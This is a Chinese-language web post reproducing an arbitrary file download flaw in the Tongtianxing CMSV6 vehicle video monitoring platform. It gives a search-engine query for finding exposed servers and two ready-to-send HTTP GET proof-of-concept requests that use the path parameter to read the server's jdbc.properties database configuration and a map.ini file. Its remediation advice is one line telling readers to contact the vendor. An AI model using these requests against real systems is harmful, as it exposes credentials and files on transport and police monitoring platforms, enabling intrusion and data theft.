【漏洞复现】通天星CMSV6车载监控平台任意文件下载漏洞 | 您所在的位置:网站首页 › 车载视频咋下载 › 【漏洞复现】通天星CMSV6车载监控平台任意文件下载漏洞 |
Nx01 产品简介
深圳市通天星科技有限公司,是一家以从事计算机、通信和其他电子设备制造业为主的企业。通天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交通上。 Nx02 漏洞描述通天星车载视频监控平台软件MobileAction_downLoad.action文件下path参数存在过滤不严格问题,导致攻击者可以恶意读取服务器的任意文件,获取敏感信息。 Nx03 产品主页hunter-query: web.body="/808gps/" Nx04 漏洞复现POC1: GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1 Host: {{Hostname}} Accept: */*POC2: GET /808gps/MobileAction_downLoad.action?path=/client/Map/map.ini HTTP/1.1 Host: {{Hostname}} Accept: */* Nx05 修复建议建议联系软件厂商进行处理。 |
CopyRight 2018-2019 实验室设备网 版权所有 |